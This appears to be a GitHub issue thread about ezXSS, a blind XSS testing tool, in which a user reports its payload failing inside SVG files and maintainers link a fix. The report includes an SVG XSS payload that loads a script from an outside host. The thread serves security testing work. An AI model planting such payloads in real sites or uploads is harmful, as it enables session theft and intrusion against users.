ezXSS: ezXSS script doesn't work in SVG files

Hi,

ezXSS script throws the Uncaught (in promise) Invalid element provided as first argument JS error in SVG files.

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" baseProfile="full">
  <script type="text/javascript" xlink:href="https://domain/"/>
</svg>

image

Other blind XSS apps work fine in SVGs.

About this issue

  • Original URL
  • State: closed
  • Created a year ago
  • Comments: 15 (9 by maintainers)

Most upvoted comments

Because I’ve changed https:// to // to also work on http only installations. I didn’t though about file: protocol and such tho.

Fixed in https://github.com/ssl/ezXSS/commit/8e103f6f979c474f66a0950634bfca2e89472fae

+8
ssl on May 30, 2023

Awesome. Thanks for helping out improving ezXSS 😃

+1
ssl on May 30, 2023
Read more comments on GitHub
← php-imap-client: Sent from macOS Mail, Inline attachment breaks email
certspotter: 429 Too Many Requests from TrustAsia and DigiCert logs →